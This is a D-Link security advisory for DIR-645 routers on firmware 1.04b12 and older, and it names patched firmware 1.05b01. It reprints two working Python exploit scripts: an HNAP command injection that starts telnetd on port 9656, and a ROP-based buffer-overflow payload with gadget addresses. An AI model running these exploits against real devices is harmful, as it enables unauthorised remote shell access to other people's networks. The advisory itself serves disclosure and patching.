D-Link Technical Support

Home Support Forums Security Advisories Shop English | French

Security Announcement

DIR-645 : Rev. Ax - Command Injection - Buffer Overflow : FW 1.04b12

Publication ID: SAP10051
Resolved Status: Yes
Published on: 13 February 2015 4:29 GMT
Last updated on: 25 April 2015 1:27 GMT

Overview

The DIR-645 Wired/Wireless Router contains a flaw that allows a malicious user to cause an overflow (halt in executing application) in the device software that could allows access to it's operating system and allows unauthenticated commands to be executied. An additional flaw has been found that allows command injection through it's HNAP interface.

References

Samuel Huntley - Contact : Link (Jan. 22, 2015)

Description

Using firmware in an emulator to determine exploits, the author designed exploit scripts written in python that give details.

"The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture."

In order to maintain author's intent and accuracy of the disclosure we encourage you to contact the author at the provided link above.

Details

1. Command injection

----------------------------------------------------------------------------------------------------------------------

import socket
import struct

buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"

print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)

----------------------------------------------------------------------------------------------------------------------

2. Buffer overflow

----------------------------------------------------------------------------------------------------------------------

import socket

import struct

exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158

exploit_buffer+="C"*50+"Z"*46

exploit_buffer+="\xb4\x67\xb3\x2a"

exploit_buffer+="\xd0\xeb\xb4\x2a"

exploit_buffer+="VVVV"

exploit_buffer+="\x7c\xba\xb1\x2a"

exploit_buffer+="K"*16

exploit_buffer+="\x44\x3b\xb0\x2A"

exploit_buffer+="A"*36

exploit_buffer+="\xf0\x5e\xb0\x2A"

exploit_buffer+="H"*16

exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"

print "[+] sending exploit_bufferfer size", len(exploit_buffer)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("10.0.0.1", 80))

s.send(exploit_buffer)

----------------------------------------------------------------------------------------------------------------------

Affected Product

Model Name

HW Version

Current FW Version

New FW Version for this exploit fix

DIR-645

A1

v. 1.04b12 and older

FW: Patch 1.05b01

Release Notes: Link

(Updated: 04/24/2015)

Security patch for your D-Link Devices

These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.

As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.